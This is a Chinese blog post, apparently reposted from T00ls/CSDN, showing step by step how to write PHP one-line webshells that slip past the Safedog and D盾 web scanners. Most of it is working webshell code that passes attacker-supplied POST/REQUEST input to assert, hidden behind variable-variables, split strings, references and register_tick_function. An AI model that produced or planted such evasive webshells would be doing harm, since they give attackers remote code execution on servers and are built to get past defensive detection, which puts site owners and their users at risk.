php一句话木马的老生常谈,可过D盾,安全狗 - Go语言中文社区

php一句话木马的老生常谈,可过D盾,安全狗

首发T00ls,原文地址https://www.t00ls.net/thread-45367-1-1.html

这边也是才进t00ls,算是一个小小的分享吧。
首先是过安全狗,这里讲下怎么一步步过安全狗。
首先下面这个马很简单,只用了一个变量覆盖,所以,不出所料被杀了
        $b=$_POST['x'];
        $a='b';
        @assert($$a);
1.png 
马被杀了那肯定要想办法免杀,我们试试把assert分开呢?
        $b=$_POST['x'];
        $a='b';
        $c=’a’.’s’.’s’.’e’.’r’.’t’;
        @$c($$a);
2.png 
还是不行,,那我再想想其他办法,引用下?换个思路呀?
        $a='b';
        $b=&$d;
        $c='a'.'s'.'s'.'e'.'r'.'t';
        $d=$_POST['x'];
        $c($$a);
3.png 
可以了,,这边可以看到,其实安全狗多绕绕,他就晕掉了。不过这个D盾还是会报警。
下面就分享一个D盾不报警的吧。
<?php
$a=array("assert"=>"XC90");
$b=array_keys($a,'XC90');
declare(ticks=1);
register_tick_function($b[0], $_REQUEST['x']);
?>
4.png 

版权声明:本文来源CSDN,感谢博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/zhalang8324/article/details/80001390
站方申明:本站部分内容来自社区用户分享,若涉及侵权,请联系站方删除。
  • 发表于 2020-06-28 01:37:22
  • 阅读 ( 1409 )
  • 分类:

你可能感兴趣的文章

精选的优质文章

0 条评论

请先 登录 后评论

官方社群

GO教程

推荐文章

猜你喜欢

随便看看

来源51CTO

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!